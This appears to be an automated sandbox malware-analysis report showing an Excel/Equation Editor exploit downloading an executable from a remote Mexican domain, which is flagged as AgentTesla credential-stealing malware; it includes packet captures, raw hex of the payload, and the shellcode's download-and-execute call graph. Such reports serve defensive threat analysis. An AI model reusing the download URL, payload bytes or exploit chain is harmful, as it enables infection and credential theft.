                      Oct 10, 2024 09:40:29.195722103 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.195724964 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.195750952 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.195751905 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.195765018 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.195768118 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.195775986 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.195794106 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.195797920 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.195804119 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.195813894 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.195827007 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.195831060 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.195841074 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.195847988 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.195854902 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.195872068 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.195894003 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.196913004 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.826195955 CEST4916380192.168.2.22104.21.53.112
                      TimestampSource PortDest PortSource IPDest IP
                      Oct 10, 2024 09:40:27.590595007 CEST5456253192.168.2.228.8.8.8
                      Oct 10, 2024 09:40:27.602055073 CEST53545628.8.8.8192.168.2.22
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Oct 10, 2024 09:40:27.590595007 CEST192.168.2.228.8.8.80x2586Standard query (0)eficienciaeningenieria.com.mxA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Oct 10, 2024 09:40:27.602055073 CEST8.8.8.8192.168.2.220x2586No error (0)eficienciaeningenieria.com.mx104.21.53.112A (IP address)IN (0x0001)false
                      Oct 10, 2024 09:40:27.602055073 CEST8.8.8.8192.168.2.220x2586No error (0)eficienciaeningenieria.com.mx172.67.212.58A (IP address)IN (0x0001)false
                      • eficienciaeningenieria.com.mx
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.2249163104.21.53.112803564C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      TimestampBytes transferredDirectionData
                      Oct 10, 2024 09:40:27.622111082 CEST330OUTGET /vnkl/ng5th.exe HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: eficienciaeningenieria.com.mx
                      Connection: Keep-Alive
                      Oct 10, 2024 09:40:28.203718901 CEST1236INHTTP/1.1 200 OK
                      Date: Thu, 10 Oct 2024 07:40:28 GMT
                      Content-Type: application/x-msdownload
                      Content-Length: 1128615
                      Connection: keep-alive
                      Last-Modified: Tue, 08 Oct 2024 08:42:11 GMT
                      Vary: Accept-Encoding
                      Cache-Control: max-age=14400
                      CF-Cache-Status: REVALIDATED
                      Accept-Ranges: bytes
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FPECWJNRPWxSuYTQxpFRCNFGz%2BYtYo1BnLj4wePLlCsnvDdgc5Hgs6Or3nCd%2BDpYKpD1ZZcna6daAnt4HJldLia0vtk5QCqQrvGZcCkdKlWXyIM79kox0B1hRTZulRguAxQLQADMZWzgNIhyZr%2BWSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8d04f6633acc42d8-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 82 c1 ed 69 e3 af be 69 e3 af be 69 e3 af be d4 ac 39 be 6b e3 af be 60 9b 3a be 77 e3 af be 60 9b 2c be db e3 af be 60 9b 2b be 50 e3 af be 4e 25 c2 be 63 e3 af be 4e 25 d4 be 48 e3 af be 69 e3 ae be 64 e1 af be 60 9b 20 be 2f e3 af be 77 b1 3a be 6b e3 af be 77 b1 3b be 68 e3 af be 69 e3 38 be 68 e3 af be 60 9b 3e be 68 e3 af be 52 69 63 68 69 e3 af be 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 87 cf 93 4b 00 00 00 00 00 00 00 00 e0 00 23 01 0b 01 09 00 00 02 08 00 00 d6 01 00 00 00 00 00 10 63 01 00 00 10 00 00 00 20 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED]
                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-iii9k`:w`,`+PN%cN%Hid` /w:kw;hi8h`>hRichiPELK#c @P5!@@<T @
                      Oct 10, 2024 09:40:28.203747988 CEST1236INData Raw: 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 00 08 00 00 10 00 00 00 02 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5c d9 00 00 00 20 08 00 00 da 00 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00
                      Data Ascii: .text `.rdata\ @@.datah@.rsrcH@@
                      Oct 10, 2024 09:40:28.203762054 CEST1236INData Raw: 09 50 e8 13 00 01 00 83 c4 04 56 8d b3 ec 00 00 00 57 c7 06 70 a0 48 00 e8 1e f5 00 00 8b 46 04 50 e8 f4 ff 00 00 83 c4 04 8d 8b bc 00 00 00 e8 17 13 00 00 8d 7b 78 e8 4f 00 00 00 8d 7b 34 e8 47 00 00 00 8d 4b 24 e8 ff 12 00 00 5f 8d 4b 14 5e e9
                      Data Ascii: PVWpHFP{xO{4GK$_K^FF8uQVRVw^j"FV@3FFQV3
                      Oct 10, 2024 09:40:28.203840017 CEST1236INData Raw: 00 00 83 7c 24 18 00 0f 8c 68 99 02 00 3b df 0f 84 c6 fd ff ff e9 5b 99 02 00 8b 44 24 18 8b 4c 24 1c 8b 5c 24 28 8b 7c 24 2c 8b 74 24 20 8b 54 24 24 50 51 6a 00 e8 5c d1 00 00 85 c0 0f 85 7d 98 02 00 39 44 24 30 0f 85 07 99 02 00 8d 44 24 6c e8
                      Data Ascii: |$h;[D$L$\$(|$,t$ T$$PQj\}9D$0D$lD$<D$xD$HD$TD$`3_^][tD$0@L$T$QD$4D$RPRfzD$D$D$4@|$4t$lD$D$D$$D$4@|
                      Oct 10, 2024 09:40:28.203859091 CEST1236INData Raw: 01 00 00 a8 03 00 00 89 94 24 34 01 00 00 c7 84 24 38 01 00 00 01 00 00 00 c7 84 24 3c 01 00 00 04 00 00 00 e8 c4 15 01 00 8d 44 24 30 50 8d 8c 24 4c 01 00 00 33 d2 51 66 89 94 24 36 01 00 00 e8 cf f9 00 00 83 c4 20 8d 94 24 18 01 00 00 52 6a 01
                      Data Ascii: $4$8$<D$0P$L3Qf$6 $Rj$HL$B_^]F;xQSUdH)d\HdBd(`LVWjjjhwH'H
                      Oct 10, 2024 09:40:28.203872919 CEST1236INData Raw: 85 ed 7e 2f 33 db 43 53 6a 01 6a 00 57 e8 cd ae 00 00 83 c4 10 8d 7c 24 18 8b f0 e8 cf c4 00 00 8b cf 8d 44 24 3c e8 f4 f8 ff ff 3b dd 0f 8c b6 a0 02 00 8d 4c 24 18 e8 93 04 00 00 8d 74 24 28 e8 2a 71 00 00 8d 7c 24 50 e8 91 f8 ff ff c7 44 24 3c
                      Data Ascii: ~/3CSjjW|$D$<;L$t$(*q|$PD$<D$PHH|L$TQ1L$@V_^][PUl$VWUNF9!FLQURS_^]SFn
                      Oct 10, 2024 09:40:28.203886986 CEST1236INData Raw: 8b 41 0c 83 38 00 75 18 56 8b f1 8b 0e 51 e8 b7 ec 00 00 8b 56 0c 52 e8 ae ec 00 00 83 c4 08 5e c3 cc cc cc cc cc cc cc cc cc cc 0f b7 47 08 66 83 f8 30 7c 10 66 83 f8 3f 7f 0a 8b 07 85 c0 0f 85 e6 77 02 00 6a 10 e8 a9 f0 00 00 83 c4 04 85 c0 0f
                      Data Ascii: A8uVQVR^Gf0|f?wjwVPNHNHUl$;l$SV3W|$9]}]G9Es33EQ,EPuGE;vb$j
                      Oct 10, 2024 09:40:28.203917027 CEST1236INData Raw: cc cc cc cc cc cc cc 0f b7 46 08 66 83 f8 30 7c 2e 66 83 f8 3f 7f 28 53 8b 1e 85 db 74 1a 8b 43 0c ff 08 8b 43 0c 83 38 00 0f 84 fe 72 02 00 53 e8 c1 e7 00 00 83 c4 04 c7 06 00 00 00 00 5b 66 83 ff 3f 66 89 7e 08 7e 1b 66 83 ff 10 0f 84 f3 72 02
                      Data Ascii: Ff0|.f?(StCC8rS[f?f~~frf rf0}SUl$VW4CfZvfarfzwVfAsf0f_tMUQR@&H3$EPp&IP
                      Oct 10, 2024 09:40:28.203929901 CEST1236INData Raw: 83 68 02 00 00 66 83 f8 5f 0f 84 10 01 00 00 83 7c 24 24 00 0f 84 e9 85 02 00 8d 44 24 20 e8 f0 fa ff ff 8b 74 24 24 8b 7c 24 20 56 57 ff 15 40 26 48 00 66 83 7c 24 1c 30 0f 8d 82 02 00 00 ba 33 00 00 00 6a 10 66 89 54 24 20 e8 fd e6 00 00 83 c4
                      Data Ascii: hf_|$$D$ t$$|$ VW@&Hf|$03jfT$ L$,T$(8pPHD$D$P|$@qf<k&fD$f0|f?|$<L$QfD$ D$fl$",t$,uT$ RHV?3_^](t
                      Oct 10, 2024 09:40:28.203948021 CEST1236INData Raw: 89 14 41 8b c6 5e c2 04 00 cc cc cc cc cc cc 40 83 ec 0c 39 46 08 72 04 83 c4 0c c3 3d c2 41 00 00 0f 83 f2 6b 02 00 03 c0 89 46 08 8b 46 08 85 c0 0f 84 b3 6c 02 00 83 c0 07 c1 e8 03 03 c0 03 c0 03 c0 33 c9 89 46 08 ba 02 00 00 00 f7 e2 0f 90 c1
                      Data Ascii: A^@9Fr=AkFFl3FWQtNTRPWXP>_UV4f|KA~KL$T$IT$Cf;t?F8~F@'Ff,AF
                      Oct 10, 2024 09:40:28.208635092 CEST1236INData Raw: 52 8b c7 e8 c3 05 00 00 8b 74 24 24 83 06 ff 75 16 8b 44 24 18 50 e8 5f d9 00 00 83 c4 04 56 e8 56 d9 00 00 83 c4 04 b0 01 84 c0 0f 84 c2 01 00 00 8b 44 24 44 3d fe 0f 00 00 0f 87 50 7f 02 00 8b 44 24 40 50 8d 8c 24 ac 08 00 00 51 e8 ca dc 00 00
                      Data Ascii: Rt$$uD$P_VVD$D=PD$@P$QD$33tStSJftt*$d$ftf|FGftu3f|$$Q]}tAp|0


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:03:39:36
                      Start date:10/10/2024
                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Imagebase:0x13f680000
                      File size:28'253'536 bytes
                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:2
                      Start time:03:40:25
                      Start date:10/10/2024
                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                      Imagebase:0x400000
                      File size:543'304 bytes
                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:5
                      Start time:03:40:28
                      Start date:10/10/2024
                      Path:C:\Users\user\AppData\Local\Temp\zwuonypqu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\zwuonypqu.exe
                      Imagebase:0x400000
                      File size:1'128'615 bytes
                      MD5 hash:E393C90747E935149ECABF5AF936A07A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.478380635.0000000000310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.478380635.0000000000310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.478380635.0000000000310000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 47%, ReversingLabs
                      • Detection: 48%, Virustotal, Browse
                      Reputation:low
                      Has exited:true

                      Target ID:6
                      Start time:03:40:32
                      Start date:10/10/2024
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\zwuonypqu.exe
                      Imagebase:0x1f0000
                      File size:45'248 bytes
                      MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.627037651.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.627037651.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.627425895.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate
                      Has exited:false

                      Reset < >

                        Execution Graph

                        Execution Coverage:1.7%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:35.9%
                        Total number of Nodes:128
                        Total number of Limit Nodes:3
                        execution_graph 3115 3520212 3116 3520220 3115->3116 3133 3520401 ExitProcess 3116->3133 3118 35203ef 3150 3520436 3118->3150 3170 352041a 3133->3170 3135 352040d 3136 3520436 8 API calls 3135->3136 3139 3520427 3135->3139 3136->3139 3137 352046f 3138 35204d9 URLDownloadToFileW 3141 352055e 3 API calls 3138->3141 3145 352054a 3138->3145 3139->3137 3142 35204b6 3139->3142 3143 3520457 3139->3143 3141->3145 3142->3138 3144 3520541 4 API calls 3142->3144 3146 3520499 7 API calls 3143->3146 3144->3138 3147 352058c 3 API calls 3145->3147 3149 35205c1 3145->3149 3146->3137 3148 3520584 3147->3148 3149->3118 3151 352043c 3150->3151 3186 352045d 3151->3186 3171 3520420 3170->3171 3172 3520436 8 API calls 3171->3172 3174 3520427 3171->3174 3172->3174 3173 35204d9 URLDownloadToFileW 3176 352055e 3 API calls 3173->3176 3180 352054a 3173->3180 3177 35204b6 3174->3177 3178 3520457 3174->3178 3185 352046f 3174->3185 3176->3180 3177->3173 3179 3520541 4 API calls 3177->3179 3181 3520499 7 API calls 3178->3181 3179->3173 3182 352058c 3 API calls 3180->3182 3184 35205c1 3180->3184 3181->3185 3183 3520584 3182->3183 3184->3135 3187 3520460 3186->3187 3188 3520499 7 API calls 3187->3188 3189 352046f 3188->3189 3071 3520499 3072 352049b 3071->3072 3075 35204ae LoadLibraryW 3072->3075 3074 35204a0 3086 35204c8 3075->3086 3077 35204d9 URLDownloadToFileW 3082 352054a 3077->3082 3096 352055e 3077->3096 3079 35204b5 3079->3077 3100 3520541 URLDownloadToFileW 3079->3100 3085 35205c1 3082->3085 3106 352058c 3082->3106 3085->3074 3087 35204c9 3086->3087 3088 3520541 4 API calls 3087->3088 3089 35204d9 URLDownloadToFileW 3088->3089 3091 352054a 3089->3091 3092 352055e 3 API calls 3089->3092 3093 352058c 3 API calls 3091->3093 3095 35205c1 3091->3095 3092->3091 3094 3520584 3093->3094 3095->3079 3097 3520561 3096->3097 3098 352058c 3 API calls 3097->3098 3099 3520584 3098->3099 3101 352055e 3 API calls 3100->3101 3102 352054a 3101->3102 3103 35205c1 3102->3103 3104 352058c 3 API calls 3102->3104 3103->3077 3105 3520584 3104->3105 3107 352058f WinExec 3106->3107 3112 35205ac 3107->3112 3110 3520584 3111 35205af ExitProcess 3111->3110 3113 35205af ExitProcess 3112->3113 3114 35205a0 3113->3114 3114->3110 3114->3111 3226 352019c 3227 35201a6 3226->3227 3228 3520401 11 API calls 3227->3228 3229 35203ef 3228->3229 3230 3520436 8 API calls 3229->3230 3233 3520427 3230->3233 3231 352046f 3232 35204b6 3237 3520541 4 API calls 3232->3237 3239 35204d9 URLDownloadToFileW 3232->3239 3233->3231 3233->3232 3238 3520457 3233->3238 3235 352055e 3 API calls 3236 352054a 3235->3236 3241 352058c 3 API calls 3236->3241 3243 35205c1 3236->3243 3237->3239 3240 3520499 7 API calls 3238->3240 3239->3235 3239->3236 3240->3231 3242 3520584 3241->3242 3069 35205b3 GetPEB 3070 35205c1 3069->3070 3605 3520062 3607 3520033 3605->3607 3606 3520020 3607->3605 3607->3606 3608 3520401 11 API calls 3607->3608 3609 35203ef 3608->3609 3610 3520436 8 API calls 3609->3610 3613 3520427 3610->3613 3611 352046f 3612 35204d9 URLDownloadToFileW 3615 352055e 3 API calls 3612->3615 3619 352054a 3612->3619 3613->3611 3616 35204b6 3613->3616 3617 3520457 3613->3617 3615->3619 3616->3612 3618 3520541 4 API calls 3616->3618 3621 3520499 7 API calls 3617->3621 3618->3612 3620 35205c1 3619->3620 3622 352058c 3 API calls 3619->3622 3621->3611 3623 3520584 3622->3623 3714 352002c 3716 3520033 3714->3716 3715 3520020 3716->3715 3717 3520401 11 API calls 3716->3717 3718 35203ef 3717->3718 3719 3520436 8 API calls 3718->3719 3721 3520427 3719->3721 3720 35204d9 URLDownloadToFileW 3723 352055e 3 API calls 3720->3723 3727 352054a 3720->3727 3724 35204b6 3721->3724 3725 3520457 3721->3725 3732 352046f 3721->3732 3723->3727 3724->3720 3726 3520541 4 API calls 3724->3726 3728 3520499 7 API calls 3725->3728 3726->3720 3729 352058c 3 API calls 3727->3729 3731 35205c1 3727->3731 3728->3732 3730 3520584 3729->3730

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_03520254 1 Function_0352005A 2 Function_035205DB 3 Function_035203D8 3->2 4 Function_0352055E 3->4 6 Function_03520541 3->6 24 Function_03520499 3->24 29 Function_03520401 3->29 32 Function_0352058C 3->32 37 Function_03520436 3->37 4->32 5 Function_0352045D 5->24 6->2 6->4 6->32 7 Function_035202C6 7->2 7->4 7->6 7->24 7->29 7->32 7->37 8 Function_035204C8 8->2 8->4 8->6 8->32 9 Function_0352004D 9->2 9->4 9->6 9->24 9->29 9->32 9->37 10 Function_035201F3 10->2 10->4 10->6 10->24 10->29 10->32 10->37 11 Function_035201F0 11->2 11->4 11->6 11->24 11->29 11->32 11->37 12 Function_03520271 12->2 12->4 12->6 12->24 12->29 12->32 12->37 13 Function_03520376 13->2 13->4 13->6 13->24 13->29 13->32 13->37 14 Function_035201F8 14->2 14->4 14->6 14->24 14->29 14->32 14->37 15 Function_03520378 15->2 15->4 15->6 15->24 15->29 15->32 15->37 16 Function_035201FD 16->2 16->4 16->6 16->24 16->29 16->32 16->37 17 Function_03520062 17->2 17->4 17->6 17->24 17->29 17->32 17->37 18 Function_03520262 18->2 18->4 18->6 18->24 18->29 18->32 18->37 19 Function_03520360 19->2 19->4 19->6 19->24 19->29 19->32 19->37 20 Function_035202E5 20->2 20->4 20->6 20->24 20->29 20->32 20->37 21 Function_0352026E 21->2 21->4 21->6 21->24 21->29 21->32 21->37 22 Function_03520212 22->2 22->4 22->6 22->24 22->29 22->32 22->37 23 Function_0352041A 23->2 23->4 23->6 23->24 23->32 23->37 47 Function_0352062C 23->47 45 Function_035204AE 24->45 25 Function_0352021E 25->2 25->4 25->6 25->24 25->29 25->32 25->37 26 Function_0352019C 26->2 26->4 26->6 26->24 26->29 26->32 26->37 27 Function_03520202 27->2 27->4 27->6 27->24 27->29 27->32 27->37 28 Function_03520000 29->2 29->4 29->6 29->23 29->24 29->32 29->37 30 Function_03520207 30->2 30->4 30->6 30->24 30->29 30->32 30->37 31 Function_0352030E 46 Function_035205AC 32->46 33 Function_0352020C 33->2 33->4 33->6 33->24 33->29 33->32 33->37 34 Function_035205B3 34->2 35 Function_035203B3 35->2 35->4 35->6 35->24 35->29 35->32 35->37 36 Function_03520231 36->2 36->4 36->6 36->24 36->29 36->32 36->37 37->2 37->4 37->5 37->6 37->24 37->32 37->47 38 Function_03520236 38->2 38->4 38->6 38->24 38->29 38->32 38->37 39 Function_035202BA 39->2 39->4 39->6 39->24 39->29 39->32 39->37 40 Function_0352023B 40->2 40->4 40->6 40->24 40->29 40->32 40->37 41 Function_0352023E 41->2 41->4 41->6 41->24 41->29 41->32 41->37 42 Function_035202BF 42->2 42->4 42->6 42->24 42->29 42->32 42->37 43 Function_035202BC 43->2 43->4 43->6 43->24 43->29 43->32 43->37 44 Function_03520225 44->2 44->4 44->6 44->24 44->29 44->32 44->37 45->2 45->4 45->6 45->8 45->32 48 Function_0352002C 48->2 48->4 48->6 48->24 48->29 48->32 48->37

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 35204ae-35204ba LoadLibraryW call 35204c8 4 352052a-3520543 URLDownloadToFileW 0->4 5 35204bc-3520529 call 3520541 0->5 8 352054a-3520555 4->8 9 3520545 call 352055e 4->9 5->4 11 35205c3-35205c8 8->11 12 3520557 8->12 9->8 13 35205ca-35205ce call 35205db 11->13 14 35205ee-35205f2 11->14 15 35205c2 12->15 16 3520559-352055a 12->16 21 35205d0-35205d2 13->21 20 35205f5 14->20 15->11 16->21 22 352055c-3520585 call 352058c 16->22 25 35205f7-35205fb 20->25 26 35205fd-3520601 20->26 27 35205c1 21->27 28 35205d4-35205d8 21->28 25->26 31 3520609-3520610 25->31 32 3520603-3520607 26->32 33 3520616-3520618 26->33 27->11 35 3520612 31->35 36 3520614 31->36 32->31 32->33 38 3520628-3520629 33->38 35->33 39 352061a-3520623 36->39 41 3520625 39->41 42 35205ec-35205ef 39->42 41->38 42->39 43 35205f1 42->43 43->20
                        APIs
                        • LoadLibraryW.KERNEL32(035204A0), ref: 035204AE
                          • Part of subcall function 035204C8: URLDownloadToFileW.URLMON(00000000,035204D9,52DBFD46,00000000,00000000), ref: 03520543
                        Memory Dump Source
                        • Source File: 00000002.00000002.470067451.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                        Similarity
                        • API ID: DownloadFileLibraryLoad
                        • String ID:
                        • API String ID: 2776762486-0
                        • Opcode ID: 2802a45f90439ff49fc7487b4099459e7115790a6d98a09e2b7da85db84b23a5
                        • Instruction ID: 23b58b8c0f0fdf1db09fcc7482759c843afa1414f464fa0ecda15d5662e9ffbb
                        • Opcode Fuzzy Hash: 2802a45f90439ff49fc7487b4099459e7115790a6d98a09e2b7da85db84b23a5
                        • Instruction Fuzzy Hash: 2321BDA510D3D52FD712DB309D6AB45BF747B93600F18C68EE5810F0E3E3A0A205C766

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 44 352058c-35205a3 WinExec call 35205ac 49 35205f5 44->49 50 35205a5 44->50 51 35205f7-35205fb 49->51 52 35205fd-3520601 49->52 53 3520616-3520618 50->53 54 35205a7-35205b1 ExitProcess 50->54 51->52 55 3520609-3520610 51->55 52->53 56 3520603-3520607 52->56 58 3520628-3520629 53->58 63 35205e7-35205ea 54->63 59 3520612 55->59 60 3520614 55->60 56->53 56->55 59->53 61 352061a-3520623 60->61 61->63 64 3520625 63->64 65 35205ec-35205ef 63->65 64->58 65->61 66 35205f1 65->66 66->49
                        APIs
                        • WinExec.KERNEL32(52DBFF62,00000001), ref: 03520599
                          • Part of subcall function 035205AC: ExitProcess.KERNELBASE(00000000), ref: 035205B1
                        Memory Dump Source
                        • Source File: 00000002.00000002.470067451.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                        Similarity
                        • API ID: ExecExitProcess
                        • String ID:
                        • API String ID: 4112423671-0
                        • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                        • Instruction ID: 039121e1a04e6f4d9c6dfa7223bd4687b3073e2d5c0d7a0b4641c78b35ecc89c
                        • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                        • Instruction Fuzzy Hash: EBF0FED964727615CF30F628F8587A7EF51BBD3310FCC48469491071F5D568A1C38AA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 67 3520436-3520444 call 352062c call 352045d 72 35204b6-35204ba 67->72 73 3520446-352044b 67->73 74 352052a-3520543 URLDownloadToFileW 72->74 75 35204bc-35204bd 72->75 73->72 76 352044d 73->76 80 352054a-3520555 74->80 81 3520545 call 352055e 74->81 78 35204be-35204c3 75->78 76->78 79 352044f-3520453 76->79 82 35204c9-3520529 call 3520541 78->82 83 3520455 79->83 84 35204a8-35204ac 79->84 86 35205c3-35205c8 80->86 87 3520557 80->87 81->80 82->74 83->82 85 3520457-35204a5 call 3520499 83->85 85->84 88 35205ca-35205ce call 35205db 86->88 89 35205ee-35205f2 86->89 90 35205c2 87->90 91 3520559-352055a 87->91 97 35205d0-35205d2 88->97 95 35205f5 89->95 90->86 91->97 98 352055c-3520585 call 352058c 91->98 101 35205f7-35205fb 95->101 102 35205fd-3520601 95->102 103 35205c1 97->103 104 35205d4-35205d8 97->104 101->102 108 3520609-3520610 101->108 109 3520603-3520607 102->109 110 3520616-3520618 102->110 103->86 113 3520612 108->113 114 3520614 108->114 109->108 109->110 117 3520628-3520629 110->117 113->110 118 352061a-3520623 114->118 122 3520625 118->122 123 35205ec-35205ef 118->123 122->117 123->118 126 35205f1 123->126 126->95
                        APIs
                        • URLDownloadToFileW.URLMON(00000000,035204D9,52DBFD46,00000000,00000000), ref: 03520543
                        Memory Dump Source
                        • Source File: 00000002.00000002.470067451.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                        Similarity
                        • API ID: DownloadFile
                        • String ID:
                        • API String ID: 1407266417-0
                        • Opcode ID: 2ceebe300e7069015a03b2317e717762cbaaea65aa49f4dbc6b5c4d673f7eede
                        • Instruction ID: 48d0a3872332a58b4dda0f344d5f8c0fc81f348bb5ac1c341cfd9774738c5719
                        • Opcode Fuzzy Hash: 2ceebe300e7069015a03b2317e717762cbaaea65aa49f4dbc6b5c4d673f7eede
                        • Instruction Fuzzy Hash: 0941DEA540E3E52FD712DB30AE6A655BF647B93210F0CCACED5950B1F3E3A4A205C792

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 132 35204c8-3520543 call 3520541 URLDownloadToFileW 140 352054a-3520555 132->140 141 3520545 call 352055e 132->141 142 35205c3-35205c8 140->142 143 3520557 140->143 141->140 144 35205ca-35205ce call 35205db 142->144 145 35205ee-35205f2 142->145 146 35205c2 143->146 147 3520559-352055a 143->147 150 35205d0-35205d2 144->150 149 35205f5 145->149 146->142 147->150 151 352055c-3520585 call 352058c 147->151 153 35205f7-35205fb 149->153 154 35205fd-3520601 149->154 155 35205c1 150->155 156 35205d4-35205d8 150->156 153->154 158 3520609-3520610 153->158 159 3520603-3520607 154->159 160 3520616-3520618 154->160 155->142 162 3520612 158->162 163 3520614 158->163 159->158 159->160 165 3520628-3520629 160->165 162->160 166 352061a-3520623 163->166 168 3520625 166->168 169 35205ec-35205ef 166->169 168->165 169->166 170 35205f1 169->170 170->149
                        Memory Dump Source
